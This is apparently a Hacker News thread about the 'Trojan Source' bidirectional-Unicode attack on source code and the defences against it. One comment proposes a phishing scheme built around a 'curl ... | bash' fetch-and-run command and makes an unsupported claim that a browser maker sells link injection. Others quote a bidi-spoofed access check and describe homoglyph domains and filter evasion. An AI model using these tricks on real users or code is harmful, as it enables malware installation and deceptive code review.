Doesn't really matter. The major browser is intentionally security compromised, anyway.

If you pay the maker of the that browser they'll inject any links you want on most pages on the internet. Just give them the hash of the email / phone number of your target. It helps both economically and passing their security checks if you have more than a thousand victims you want to target.

If you want to fool a developer just host it on a github page. If you want to fool anyone else, just do a decent clone of their page.

If you want it to appear on most major news network sites, just pay $150 for a newswire.

Think about it, if you crafted the right article, maybe about a fork of homebrew etc, and redirected to a github page with a link stating you needed to copy and paste

curl http://github.com/asdkfjas/homebrew.sh | bash

into their terminals how many would do it?

Came here to provide exactly that link (canonical: <https://perldoc.perl.org/perlre#Script-Runs>). For those who figured they'd skip over it, it's pretty neat IMO. Perl 5.28 (released 2018) added a new technique for matching patterns that aren't all from the same Unicode script, a "script run."

>In most places a single word would never be written in multiple scripts, unless it is a spoofing attack. An infamous example, is


>Those letters could all be Latin (as in the example just above), or they could be all Cyrillic (except for the dot), or they could be a mixture of the two. In the case of an internet address the .com would be in Latin, And any Cyrillic ones would cause it to be a mixture, not a script run.

> You can't (any more)¹.

That was my understanding too, until this last week when I figured out you could.

I'm pretty certain this: and this: are the same rendering, but are different Unicode, and I can register them both as domain names under some TLDs. Google displays them the same in their result pages too.

I examined closely and found both are exactly the same, a perfectly valid Latin script run and equivalent to the expression in escape notation "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".

    > perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
    0000  74 68 69 73 3a                                    this:
HN software likely ate the relevant details you wanted to show, can you please try again and use a notation that survives the HN filter?

Try this: https://kingcharles.one/unistrange.html

When I created the file in Notepad it showed the hidden code, but I can register both those as valid domains and Google will show them identically in the SERPs, and Safari will show them both identically in the address bar. Chrome/Edge expands them in the address bar, but will render them the same in HTML. Have not tested on Firefox.

If you View Source in Chrome it won't show the hidden code, but if you open the dev tools it will start to break.

> You're right - their headline is written for attention

That or just ignorance. Krebs has zero training or education in computer science or programming.

https://github.com/rust-lang/rust/issues/28979 plenty of discussion here on Unicode including homoglyph attacks. This is for Rust but has links to Go and Zig. The Unicode standard also has extensive discussion, for example https://unicode.org/reports/tr31/ and http://unicode.org/reports/tr39/ on identifiers and security.

In general a multilayer solution is needed: compilers, linters, Unicode standard, merge tools, editors, and so on.

But they still don't get it right, they explicitly allow not identifiable Unicode identifiers. The C20 committee recently allowed also insecure identifiers, completely ignoring the Unicode identifier guidelines. They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database. Why do they allow noobs into such committees? What is needed are the normalization tables (tiny), the script list (tiny) and the two xid lists.

> they explicitly allow not identifiable Unicode identifiers. [...] They stated that nobody cares, everybody wants them and making them secure would need the entire Unicode database.

Could you elaborate? rustc ships with the entire Unicode db and only allows indents with codepoints advertised by Unicode as allowed in indents.

The closest to walking off the beaten path is a (still unmerged) parser recovery PR that accepts emojis as identifiers if and only if a parse error would otherwise occur as a way to avoid knock down errors when someone tries to use them.

For identifier security you don't need the entire Unicode DB. Only rust or glibc would do that, nobody else. You need the XID_Start/Continue list of bits, a single normalization table if NFC (or two if NFD), the scripts list (ranges of a single byte), and a bit of logic. With confusables I'm not sure.

That's about 2k vs 20m.

> "IDEs and compilers should ignore character-direction codes when looking at source files."

No I think some people would disagree, arabic coders for example. People just need to be aware of this when using unicode in their product.

Editors and code views should definitely show when BiDi and other interesting Unicode features are used, just like they already do with spaces and zero-width whitespaces. These features should definitely work, but they are a liability if they can also used to mislead human users.

Compiler maintainers need to update the syntax rules to restrict free mixing of unicode characters. Similar restrictions were already adopted in domain names.

browsers have solved it for domain names. you could apply the same heuristics for not mixing e.g. cyrillic and non cyrillic in the same word/file

It's a feature for prose text, so programs like Word should support it. It's a security bug in anything designed to be parsed or interpreted by software, so programs like Visual Studio Code should refuse to honor it.

Brilliant! Nobody would copy prose, then paste it into a code file or REPL without re-reading it after the paste.

or it should be confined to the marker of the string (i.e. the quotation marks) if you're doing syntax highlighting anyway

Fun story: I discovered these in the early 2000s and simultaneously discovered that Slashdot didn't filter these out. I spent an evening randomly reversing large sections of comment pages until they finally blocked it.

I'm very, very sorry CmdrTaco.

Most web sites' comment sections will allow these. I think even Facebook allows tomfoolery like this. f̷̧̨̡̜͚̬̰͕̩̻̳̜̮̫̰̓̏̑̐̇̍͘͝è̶̙̥͚̰͈͚̹̜̼͙͚͌à̴̛̙̣̖̮̰̥̩͚̣̺͋̂̓̓̍͛͜ͅr̶̛͎̬̭̯͙͉̬̞̤̲̞̼͉̣̃̒͗̄̎̋͆̓̊͐͝ͅ ̷̦̬̳̹̦̳̭͓͖͔̺̮̩̓̆̍̊͆͊͜ẗ̵̩͙̼́̂̿́̂̈́̈́̑ḩ̸̨̝͇̖̤̱̠̼̣͈̩͈̰̃̂͂͋̏̇͗͛̓̈́̍̑͑̕̚͜ë̶̥̜̘͙̦̋ ̸̛̟̀̄̌͗́̄ͅų̷̪͙̰̜̟̰̦͇̞̥̜͓͇͊̆͗̆̀͗̀̈́̌̉͆̏͆͜ṫ̸̨̜͈̲̺͖͓̄̍̄̓̏̓̓̎͜ͅf̴̨̼̜̯͇̜̯̹͚͛8̴̧̤͖̠̳̜̤̻̟̏̀̽̃m̷̯̤̳͔̘̣͙̗̰͙͔̦̰̝͑͐͌̓̎̀̇̓̆͂̎̐̽̚͠ą̶̢̻͂̒͛̑̅̈͛͑̈́̓̚͠͝n̴̦̺͖̆̑͗̾̈̀̉̿̑̐̈́͝ͅͅ

Well yes, Facebook has users in Vietnam. Stacked diacritics are a features, not a bug.

I've seen some sites / services (Discord?) filter these out, at least to the point where they don't escape a message's vertical space. I'm sure they're truncated because those messages are pretty big in terms of amount of bytes.

And while they have valid use cases, I can't see it in e.g. comment sections or chat messages. Happy to have someone link to e.g. a Vietnamese comment section showing practical use though.

Vietnamese Wikipedia has plenty of Talk pages with discussion threads.

I’m sure you created a shitty day for one of us :( I’d like to say this was unusual, but it was pretty common.

Oof. :(

My bad, definitely sorry. A case of your favourite bubbly pop on me.

Honest question: would it be that bad to mandate and enforce 100% ASCII source files? Arguably every and any Unicode character and, well, arguably even any string of characters can (should?) go to a properties/resources file (properties/resources files which, btw, also greatly simplifies i18n/l10n).

Then build/commit/test hooks could be used to enforce that source code files are indeed 100% ASCII.

I know, I know... Some are going to lament they don't have their shiny Unicode symbols right in their source file. But... It looks like you get what you pay for.

Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

Though I comment source in English, lots of people that I work with comment in other languages. כולל עברית, מימין לשמאל.‏

> Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".

It's astounding to me that there's room for such complexity in it. I thought it was just a lot of symbols. What other rules does Unicode have besides changing the order sometimes?

The one a lot of folks know about was the soft hyphen (U+00AD) to bypass swear filters. I was able to use normalization to create XSS attacks.

Seems the bigger complaint isn't lack of fancy unicode in comments its non-english speakers with non latin alphabets wont be able to comment in their native language.

I'll leave it up to others to discuss how important this is or isn't.

Might be nice to have an easy tool to scan files and whitelist characters from specific alphabets, because in most international teams I think you'll have a common language for comments, and so I think it's unlikely that you'll need say European and Indic and Chinese characters in one code base. Except the one pain point I can see - @author annotations in the source code, if you have an international team you might end up with a variety of scripts in that field, in my mind that's something that can be lived without, but I can imagine some people being sensitive about that.

Give it a few years and unicode will probably be turing-complete. For reasons... likely not good ones though.

Unicode rendering already requires multiple finite state machines.

Alternate cause of SkyNet: a distributed horde of unicode renderers become self-aware. Emojis become command and control codes.

Wouldn't simply stripping comments before doing any other processing solve the problem? I know there are plenty of programs that sprinkle code into comments, from Emacs to linters. Or is this obviously naive?

Seems to me that if you need to put code in the comments, you've got a bigger problem. I know people like tab hints and lint overrides, but maybe it is time to focus on separation of concerns at a higher level?

> Wouldn't simply stripping comments before doing any other processing solve the problem?

No, because the exploit line doesn't contain a comment. It just looks like it does.

Having readable unicode in string literals is nice.

Even ignoring the fact that non-english speakers will want to (and do; I worked on a compiler with SJIS support 20 years ago) write comments in their native languages, it's unavoidable to have non-ascii characters in your string literals unless you want to regress user-interfaces to 1980.

> it's unavoidable to have non-ascii characters in your string literal

It might not be ideal for you, but you can always use escape codes in your string literals so it is at least possible to avoid all non-ascii characters in your code.

That was my first thought -- run all your source through an ASCII-only filter, the problem goes away.

For projects like the Linux kernel this should be absolutely feasible. A few names in headers get mangled and lose their accents but that should be acceptable. Other projects... Well there's already a couple examples in this comment section why it won't be that easy.

Here is an example, open it in an appropriate editor (vi) and you can see how easy it is to 'exploit' (if you can call it that?).


Seams like a layer 8 problem?

In case there are people who (currently) don’t have access to such an editor, here is a screenshot: https://i.imgur.com/2Ue2Vvd.png

GitHub has already updated their UI I see

The Android app renders it much more suspiciously too, though unfortunately no warning: https://imgur.com/a/L3sNFQ8

You mean, like this?


Snark aside, most text based editors have some giveaway or another. Even the GUI ones show syntax highlighting quirks that show that something is wrong.

This is only really relevant in unicode-aware terminals, without syntax highlighting and when you don't get to scroll between characters. IOW, it's really quite hard to do.

This issue has been raised before, such as at https://github.com/golang/go/issues/20209 (I was reminded of that by https://twitter.com/peter_szilagyi/status/145515080347229798...). There is some other interesting discussion there.

Ehhhh... Interesting philosophically, and we might see a practical attack maybe eventually, but most source code editors and diff reviewers that I've encountered show all non-printable characters VERY visibly. Because they matter, and always have - "func asdf()" is very different from "func as<zwsp>df()". If I saw a pile of non-printable control characters intermixed in code in a diff, there's absolutely no way I'd allow that merge.

IOCCC entries will absolutely become more fun though.

I wouldn't be so sure about visibility since it seems most code editors and programming languages want to support more unicode, not less... One of my hobbies used to be annually running a regex search through the company's millions of lines of java to see how much of an increase there was in non-printable spaces (0x200b) in java method names or other symbols. Eclipse at least wouldn't show them by default, I don't remember IntelliJ's behavior, but most people wouldn't know they were there. I was aware of only one time when it impacted someone who typed in a whole identifier by sight but the reference included a 200b and they were stuck for a bit figuring out why things didn't work.

But I agree the trick (hard to call it an attack or even bug) is fun, in the same way as the earlier tricks of fake filename extensions. And terribly obvious, even with the limitations of default code viewers, and with no plausible deniability once caught, so it's pretty overblown for practical considerations. The intentionally introduced Linux kernel bugs from several months ago were far more significant a lesson for people to learn from, and they didn't rely on any unicode tricks but on much simpler tricks that were also somewhat plausibly deniable to chalk up to an oopsie.

yeah, I've had an identifier or two like that in Ruby in the past :) always worth a few facepalm-riddled lols when sharing the final result with the rest of the team, especially since it often meant they copied the func from Stack Overflow or some equivalent.

Most of what I've encountered though has been due to a lack of unicode support, and related growing pains in adopting full UTF-8. E.g. much of the Eclipse issues I saw were due to UTF-16 weirdness and stuff encoded in ShiftJIS or whatever flavor of Windows encoding you used, and all those garbled files due to missing magic-encoding-bytes in files. UTF-8 support "completing" in tools largely cleaned all that up, since they detected the encoding, converted to UTF-8, and showed abnormal stuff as the abnormalities they were all along.

I mean, that's probably because taking a deep look at supporting UTF-8 meant taking a deep look at many of their latent text bugs and finally fixing them, but it still happened around the same time, and "X editor now supports UTF-8" also marked a dramatic increase in "... and now shows <nbsp> explicitly!" and similar things.

> IOCCC entries will absolutely become more fun though.

IOCCC doesn't allow unescaped octets with high bit set [1], so even that's no go.

[1] https://www.ioccc.org/2020/rules.txt (rule 13)

I am very curious which program abused this and forced the creation of that rule.

Probably 2000/briddlebane [1]. But it is more like a guard against compatibility issues.

[1] https://www.ioccc.org/2000/briddlebane.c vs. https://www.ioccc.org/2000/briddlebane.orig.c

Well, technically the rule only talks about entries that "fail to compile". An entry that still compiles is fine, see rule 12. In practice this means the Unicode abuse like this is only allowed in strings.

When the rule was originally introduced in 2001 [1] it was a total ban. It seems that the rule was slightly relaxed in 2013 [2], but I think it still massively discourages any octet >= 128 because there is no portable way to set the input encoding (like GCC `-finput-charset`, which is ignored by Clang AFAIK).

[1] https://www.ioccc.org/2001/rules

[2] https://www.ioccc.org/2013/rules.txt

Aww. But also of course they've already addressed this.

It's maybe worth to make a step back and take a new look at the underlying problem.

Source code combines multiple kinds of text. There are

* hierarchical structure,

* mathematical and logical syntax

* literals (especially insidious: text)

* free text in comments and

* markup in documentation

These newly discovered vulnerabilities remind me of the issue of SQL injection, which is also caused by a confusion when combining these kinds of text.

For SQL injection, the solution was to introduce facilities to explicitly combine SQL syntax and dynamic literals. Maybe we need something similar for code that enforces such strict separation. Maybe into different files or nested into a container format. There are already facilities for doing so (resource files, templating languages) but they are opt-in and don't go far enough to address the newly discovered problems.

The cost would be that code could become more difficult to edit with plain-text editors.

Why is bidirectionality handled when text is being rendered onto the screen, instead of when it's being input from the keyboard? Why not render every single character in LTR order, and have RTL support instead be handled by text input fields moving the cursor in the opposite direction after each RTL character is typed? (I know it's too late to change this now. I'm asking why we didn't do it this way from the beginning.)

If I understand correctly, what you're suggesting could be thought of as pre-rendering directionality into the memory layout. If we did that then it might compromise our ability to write an algorithm that iterates over a string of hebrew or arabic characters. Display is super complicated and people don't agree on how to do it. For example, consider the arabic text عودة أبو تايه‎. If I sneak a latin A between all those characters to prevent the display algorithm from rearranging and shaping them, then that same string looks like this: عAوAدAةAأAبAوAتAاAيAه. Those are the same characters and you can confirm that yourself using:

    for c in 'عودة أبو تايه‎':
On the other hand if you want to romanize that string as EWDTA AEBW TAIH then all you need is a for loop and a switch statement, because the memory order is always left to right. We can also rest assured that if someone invents a better display algorithm, we won't need to do any database migrations, since the encoding itself doesn't need to change.

If you have a document with mixed languages, you need to be able to edit each language in its natural direction after the fact. That requires storing directionality in the document.

And keep in mind that if you store RTL text backwards, as you propose, every algorithm now has to be able to process backwards text. Backwards spellcheck is a lot of extra work...

Flip left and right in your idea, and you can try it out without learning a new language. Remember to implement word wrap.

Because visual representation is separate from the underlying data structure. A string container doesn't have a specific direction, only a relative one. I.e. This character comes before the next and after the previous. Adding the bidi control code, the string indicates when the visual ordering changes in this relative direction system.

You could absolutely design a new string container that assumes left to right at all times and cannot be changed, but then it's on the programmer to ensure that strings are copied or concatenated in the right direction, at the right location, and substrings searching becomes a minor headache. How would you concatenate an RTL string to a forced LTR string representation? You would have to work out whether the end of the string it LTR or RTL. If LTR, append directly. If RTL find the character where the direction changes and insert the string in there - much more expensive. Better to just append the string, using bidi codes where required, and let the frontend process the string to make the appropriate direction changes. Yes, you may need to search the string for the bidi code to know which direction you're going at the end of the string, but that's just a simple reverse string search for a single control character, and not a complex variable multi-byte search of inferred character directions by codepoint values.

I think the issue is in the locations of which bidi codes are rendered. They provide an inherent untrustworthy-ness to the text area they're rendered in, and so should be treated as an exception in critical situations. I've seen the reversed exe file name trick used for years, and every time I ask myself why that's even a thing? If the OS used file headers and magic numbers to determine file types instead of the filename, it would be less of an issue.

For source code, I would question the rendering of RTL text in a source code editor as it's an obvious issue for code safety. Ideally, all source code would be kept to the same origin language - doesn't have to be english, just consistent. Any non-conforming text should ideally be loaded from a resource rather than inline within the source code, to avoid foreign character contamination and allow easier identification of these issues. Further, source code rendering should only render identified safe control codes, and treat unsafe ones as raw binary values to be shown as such - i.e. \r and \n are safe, \b is unsafe, and bidi codes would also be unsafe. You could even go so far as to include them in the syntax highlighting, but that results in a dependency on syntax highlighting to show the semantics of the source code rather than the text alone.

Or, hear me out - instead of trying to work around a legitimate feature of Unicode, you could stop storing your source code as text, because it isn't. Code is not text - it's a tree of objects, and representing it as a flat sequence of text characters causes many problems and inefficiencies (including this one!) that could be mitigated if you just stored and manipulated it as a tree.

The only reason why text was justifiable as a storage and manipulation format for code in the first place was because early computers (probably?) couldn't handle a tree format. That excuse has been invalid for several decades now, as is the idea that "everything is plain text". Code isn't plain text - if it was, then you could make arbitrary edits without syntax errors, but you can't, because code has structure. Start treating it that way.

The thing about text is that it is barebones. Everyone can agree what the structure of text is (a stream of bytes with some ascii like encoding).

For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back. Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

> The thing about text is that it is barebones.

That's a bug. Programming is hard, and you want the best, most powerful tools to handle it as you can - which means putting effort into making specialized tools instead of using generic ones like text editors.

> For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back.

No tools existed without first being built, so this isn't special. Rust didn't have any tools before people started building tools for it, for instance.

Moreover, the tools that we have now that are text-specific are pathetic. You can view the first n lines of a file? Wow, very impressive /s. More complex things like grep are just as realizable in a structure editor, and in order to use them for non-trivial stuff, you'd have to write structural regular expressions and implement mini-parsers anyway - things you would get for free if you just kept code as structure.

> Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.

You're misreading my argument. I'm not saying that people will adopt structured code (a descriptive statement), I'm saying that people should adopt structure code (a normative statement) because it'll be much better for them.

Also, you're making the assumption that onboarding is hard, and that compatibility layers can't exist - neither of which are true.

> Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.

The average programmer probably looks at their code with a hex editor once in their life - this isn't really a good argument. Moreover, the vast majority of programmers already tolerate not looking under the hood in dozens of different ways - most use VM's like CPython/JVM/JS VMs, opaque frameworks like React/Angular, graphics APIs like OpenGL/DirectX/Vulkan, complicated editors like Visual Studio Code/Emacs, and far more without ever looking under the hood of any of those - so there's no reason to not add another layer (especially because you can build that layer to be easy to peer through) for the sake of productivity.

Yes! This would also do away with a whole class of conflicts related to whitespace/formatting.

Exactly! Imagine a version control system where you get diffs on the AST tree, instead of the characters that make up the source (add an `if` and suddenly dozens of lines have "changed"), or the tabs/spaces flamewar evaporating instantly.

Nothing is stopping your current version control tool from parsing the code and showing a structural difff now.

Also helps with naming. Only need a value once or twice? Don’t bother trying to name it, just link it into the tree where it’s needed.

You can actually do that in Lisp. Lisp code is commonly thought of as a tree, but it is really a bunch of linked lists. The links can be arranged in any way you want.


The example shows this with some made–up data, but you can use it with arbitrary code as well. It is very easy to use it to create circular lists, which when executed are infinite loops.

Naturally the only sane thing to do is to keep your code strictly a tree.

I remember bringing this up many years ago. Yes specifically making code seem like comments using bidi. I'm just a little bit salty I won't get the credit.


Despite I'm not a native English speaker and I meant almost all the programs I ever wrote to be capable of processing any given language (and also have localized UIs in some cases), I see no reason for non-English strings to be allowed in source code and code files except some ad-hoc scripts in which hard-coding some text can be an optimal solution.

We probably just need a git switch which would make it throw an error if it encounters Bidi or any weirdness like that except in resource files.

Since most progamming languages are based on english, non-english text in string literals is almost always user-facing and should be put in resource files to make translation into additional languages easier.

Identifiers and comments are a serious problem though. Many application domains use terms that are tricky to translate into english. The translations could be misleading, inappropriate or not unique. Sometimes they are just plain wrong or there is no english word that fits. All of these could cause misconceptions, confusion and bugs, and make reading and working with the code and the running system harder.

> Many application domains use terms that are tricky to translate into english.

What if instead of translating those terms to English, you just transliterated them to the Latin alphabet?

That works perfectly fine for German. For languages with latin-style alphabets it depends on how used people are to work with unaccented text. For some languages (for example Vietnamese[0]), the ASCII fallback modes are quite clumsy. Languages with non-latin alphabets might completely lack a standardized, widely used romanization system that works in ASCII.

For Chinese and Japanese, using a romanization is not really an option. Most romanization systems are intended for academic study, as pronunciation aids and for input methods. Most varieties of Chinese have a huge number of homophones, and the romanization of such texts can be difficult to read unambiguously.

[0]: https://en.m.wikipedia.org/wiki/Vietnamese_Quoted-Readable

So you mean you can write a program and be unable to explain what it does in plain English?

The basic operation can be explained in English, but comments for that are potentially not as important as the implications for the application domain.

Non-English characters are quite useful in comments where you're explaining Unicode processing stuff, and in regexes working with the characters, and when you're using maths notation (proper symbols in comments, Greek letters for variables, etc.), and when you're drawing boxes in a terminal. I'm sure there are many more too.

I omitted this to keep it simple (this is why I wrote non-English rather than non-ASCII, I actually am a proponent of active usage of proper Unicode symbols like ⇒, ≠, etc, and also TUIs) but yes, I would prefer a rather extended English char-set including Greek letters, mathematical symbols, pseudographics etc. These can be useful and are not much trickier than English letters. But I would certainly like to see at least a warning (I would even prefer an Error actually) if my code file includes anything related to RTL, complex character composition or non-Latin letters other than Greek.

Looks like avoiding dependencies and snippets is a good way to mitigate this.

In my own work, I use almost no dependencies (aside from compilers and built-in APIs). Scratch that. I use a lot of dependencies, but ones that I have written, and generally rewrite snippets, when I use them.

Also, very little of the code I see, has comments.

Like, any comments; even headerdoc comments.

> Green said the good news is that the researchers conducted a widespread vulnerability scan, but were unable to find evidence that anyone was exploiting this. Yet.

… “yet” …

I know that I’m a “dependency curmudgeon,” but stuff like this just serves to reinforce my posture.

But what if this is slipped into your compiler? Your operating system's kernel? A top voted Stack Overflow answer? You can't (or it's infeasible to) check and control everything.

sigh...Why does it have to be "all or nothing"? These logical fallacies are pretty much a standard in these discussions.

Either have 100%, ironclad security, or "Who cares? YOLO! STDs be damned" abandon?

We do what we can to make sure what we write is as good as possible.

I lock my car door, when I get out. I know that it won't stop a determined thief, but it will avoid problems from the casual knucklehead.

Yes, you're totally safe then. I've never heard of standard libraries having problems that affect security, certainly not the str* family of functions.

Any particular reason for the nasty? I thought we didn't do that kind of thing, around these parts, but I'm often wrong.

The pain of having worked under these conditions of not using libraries, usually having to work with subpar libraries that were developed internally.

Like oh, hey, we need a database, great, lets roll our own. Or the ancient version of whatever lib shipped with the OS that is full of bugs solved in subsequent versions.

I see that you now use a lot of dependencies, and retract my statement.

Feel free to check out my work. You’ll see the quality bar I set for myself. Almost all of the repos are code that I incorporate into my projects. I just. Plain. Don’t. Trust. most code out there.

I can see the kitchen from the lunch counter, and I’m a damn good cook, myself.

I won’t tell anyone else what to do (unless I’m paying them), but I refuse to add code to my projects that I don’t trust completely (which is, I know, not a guarantee, but it’s a pretty good bet).

I have to rely on the core libraries and development tools I use, but, if I have my druthers, I am picky as hell.

Seriously. Look at my stuff. You’ll see that I put my work where my mouth is.

The bootstrappable community already produced a solution for this: https://github.com/oriansj/stage0/blob/master/High_level_pro...

I fail to see how this can actaully be used as an exploit. As some commenters have said, yes, it may be a risk to some open source tools where there is poor due diligence for merge request review process - but that is almost never the case.

Otherwise, if you own your own code, this obviously isn't an issue. (Unless, of couse, for some reason you want to program exploits into software at your organization :) )

Heck, even GitHub already shows a warning for files that have bi-directional unicode...

A bit of an overemotional title if you ask me.

https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a nice clear example.

Full Stack Chris reviews some code that he thinks says:

    if access_level != "user" { // Check if admin
This may be an open source project. This may be an internal bad egg (a very common threat; insider jobs are actually one of the absolute top risks to a company). Or this code may be injected by an attacker who has gained access to the repo and is leaving backdoors that they hope to survive long after their access is blocked or leaving backdoors to make deployed production systems vulnerable. Etc.

And Chris won't notice that the computer will execute:

    if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {
This is not just an attack on compiled languages. Scripting languages are just as vulnerable.

Sorry, still don’t get it.

Isn’t the issue that they are using magic strings? If the strings were something like RoleConstants.Admin then this is avoided?

Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

> Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

There is no comment string.

So after reading other parts, I get where I was mistaken but still believe proper coding practices of avoiding magic strings would avoid many of the potential issues.

My mistake was thinking the initial Unicode character was changing the comparison string similar to a non printable character could. But instead it flips the ordering so that the comment is part of the comparison string and then the string is terminated.

Don’t get hung up on strings, you can execute this attack with just comments. Look at the other examples in the paper.

The idea here is that you make part of the comment appear to be outside of it, and thus appear to be code that will be executed. You can reshuffle the text arbitrarily, so you can move text backwards to appear to be before the start of the comment, or forwards to appear to be after the end of the comment. If you really want to, you can treat the whole line as an anagram, and rearrange the individual letters into any order you like. This could enable really clever attacks where any use of an enum constant appears to be a use of a different one.

And the dev wrote test cases (negative ones too!). The test fails and shows admin privileges for the normal user. Debugging ensues. I'd hope.

The test has the same kind of change. It passes, and nobody thinks to look at the obviously-correct code.

It's this research that prompted GitHub to show warnings, they didn't appear as of yesterday.

Code search is helpful to see if any of your code contains these characters.

A bunch of hits found across the top ~2M open-source repositories: https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...

To triage, you probably want to first look at hits in code files (not JSON or Markdown, etc.):


You can set up a self-hosted instance of Sourcegraph to run this across all of your company's code: https://docs.sourcegraph.com/.

It all depends on your IDE. I've tried this, and IntelliJ and friends will show a little block with the text RLO for the right to left override or ZWS for zero with spaces for any non-standard character that might mess things up. (Neo)vim will show the unicode espace sequence instead of rendering the text as unicode directs it.

Some compilers, notably clang, will warn you that you're using an "invisible character". Assuming you at least read the warnings your code generates (because if you don't, why not just put exploitable algorithms deep down ontthe software?) you'd probably catch the issue.

Simpler programs such as the text editor that ships with GNOME will freak out, but I don't think most people are coding in that in the first place.

I think this is an interesting peculiarity, but it's not a "threat" to "the security of all code".

I'd say that neovim is bugged here and gedit is the one working properly rendering unicode as it should be

I filed this domain away under 'security alarmist nonsense' years ago. This headline and story are prime examples of the form.

Seriously. State run espionage is 100x more likely

That Unicode with its extremely large character set would become a solution to any and all character encoding problems in itself was never the case. Usually, for a given document you'll want to declare the subset that's actually in use such that a particular font with necessarily limited coverage can be used to render it. That's what's available for SGML markup documents eg in an SGML declaration, where you can declare and construct a document character set from planes or arbitrary code point ranges, and an SGML parser can verify actual content against that subset.

Was that capability dropped in the transition from sgml to XML? If so, can someone here on HN provide some pointers to the old discussion?

All discussion related to create XML as an SGML subset can be found on the xml-dev mailing list [1], with some earlier discussions and initial drafts of the SGML ERB mostly linked from there.

The capability to declare document character sets was dropped along with supporting an SGML declaration altogether.

[1]: http://lists.xml.org/archives/xml-dev/

Emacs "fix": (setq bidi-display-reordering nil) in relevant modes.

I forced it globally, are there reasons that's bad to do?

    (setf (default-value 'bidi-display-reordering) nil)
The BIDI issue looks pretty bad in emacs-gtk: the sneaky text is unnoticeable in lots of modes, unless the cursor just happens to scroll over it.

Why did you put "fix" in quotes? Isn't that an actual fix for this?

It's more of a workaround that breaks things for people legitimately using RTL strings isn't it?

Yes. I recommend using whitespace-mode to cause these characters to be displayed visually, while still functioning correctly.

It’s not the same thing, but brings to mind Ken Thomason’s famous “Reflections on Trusting Trust” [0] from 1984.

That describes a concept, over several stages, where a compiler can be made to change the behavior of programs it compiles in a difficult-to-find way.

[0]: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

BDI can be used to evade profanity filters. Writing something like `&#x202e;kcuf` will display a banned word.

Does it work here?

> I am an toidi

No? HN strips the BDI.

But there are plenty of other systems which display weird RTL behavior.

Yes, Mastodon has recently been discussing this. https://github.com/mastodon/mastodon/issues/2777

Would the solution to this be to render the direction switch control character similar to how some text editors will render 0 bytes as a glyph with the text NUL? You could still render everything after it with the reversed direction, but it provides a visible indicator that it's been done. It might be a little annoying for people who use RTL languages, but it seems like the benefit may outweigh that.

For anyone that wants to see the real code:


I've not seen one editor yet that doesn't at least hint there's a problem with syntax highlighting, if not just outright show nonsense.

This reminds me of a trick you could do on the Commodore PET in the 1980s, where you'd embed backspaces in your BASIC code. If someone looked at the code they'd see something different from what gets executed. Effective to keep someone from copying your code in class :-)

Something puzzles me: this kind of tricks would definitely break syntax highlighting, wouldn't it?

I would say less that they discovered a new vulnerability but they they but needed focus on a long term known problem.

It's just that many people while knowing the problem never considered that it could be used in supply chain attacks.

The good old SexyHexe.pdf strikes again.

These problems won't go away for a while, unicode is fucking hard. Almost every app I ever tried it had at least some problems with %u202E (the right to left overwrite),

I thought this was a case of Source code virus[1]. With the current popularity of open source and services like github, combined with deep inter-dependencies in node.js, a virus of this kind could have a huge impact if unnoticed for long enough.

Maybe it is the next plague waiting to happen?

[1] https://en.wikipedia.org/wiki/Source_code_virus

Why is it called a Trojan horse instead of a Greek horse?

Because the Greeks transferred ownership.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact